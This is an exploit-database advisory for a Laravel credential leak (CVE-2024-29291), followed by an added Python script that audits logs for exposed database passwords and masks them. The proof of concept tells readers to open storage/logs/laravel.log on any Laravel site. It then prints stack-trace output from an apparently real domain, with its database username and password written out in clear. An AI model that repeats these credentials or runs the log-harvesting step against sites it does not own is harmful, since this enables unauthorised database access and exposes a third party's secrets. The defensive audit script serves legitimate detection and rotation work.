[webapps] Laravel Framework 11 - Credential Leakage
source link: https://www.exploit-db.com/exploits/52000
# Exploit Title: Laravel Framework 11 - Credential Leakage
# Google Dork: N/A
# Date: [2024-04-19]
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
#0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
#1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...
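As an added defender-side example that is not part of the original advisory: a small Python audit that scans a laravel.log for the stack-frame pattern shown above and reports which database accounts it exposes, with passwords masked so the output itself is safe to share while the credentials are rotated. The sample log, paths, host and credentials below are constructed placeholders, not values from any real system.

```python
import re
from typing import Dict, List

# Stack-frame calls that receive the DSN, username and password as positional
# string arguments. Both the raw PDO constructor and Laravel's wrapper appear
# in a connection-failure trace, so both are matched.
PDO_FRAME_RE = re.compile(
    r"(?P<frame>PDO->__construct|Connector->createPdoConnection)"
    r"\('(?P<dsn>[^']*)',\s*'(?P<user>[^']*)',\s*'(?P<password>[^']*)'"
)


def mask(secret: str) -> str:
    """Keep the first two characters so an operator can recognise which secret leaked."""
    return secret[:2] + "*" * (len(secret) - 2)


def find_leaked_credentials(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per stack frame that carries database credentials.

    PHP truncates string arguments in exception traces (15 characters by
    default) and appends '...', which is why the host reads 'mysql:host=sql1...';
    a password longer than that is cut the same way, reported via 'truncated'.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for m in PDO_FRAME_RE.finditer(line):
            pw = m.group("password")
            findings.append({
                "line": lineno,
                "frame": m.group("frame"),
                "dsn": m.group("dsn"),
                "user": m.group("user"),
                "password_masked": mask(pw),
                "truncated": pw.endswith("..."),
            })
    return findings


# Constructed sample in the shape of a Laravel connection-failure entry;
# every path, host and credential here is a placeholder.
SAMPLE_LOG = """\
[2024-04-19 10:12:03] production.ERROR: SQLSTATE[HY000] [1045] Access denied for user 'app_user'@'10.0.0.5' (using password: YES)
#0 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=db.e...', 'app_user', 'Sup3r-S3cret-Pa...', Array)
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\\Database\\Connectors\\Connector->createPdoConnection('mysql:host=db.e...', 'app_user', 'Sup3r-S3cret-Pa...', Array)
#2 {main}
"""

if __name__ == "__main__":
    for f in find_leaked_credentials(SAMPLE_LOG):
        print(f"line {f['line']}: {f['frame']} user={f['user']} "
              f"password={f['password_masked']} truncated={f['truncated']}")
```

Run it against a real storage/logs/laravel.log from your own deployment; any finding means the account's password should be rotated and the log directory confirmed to sit outside the web document root.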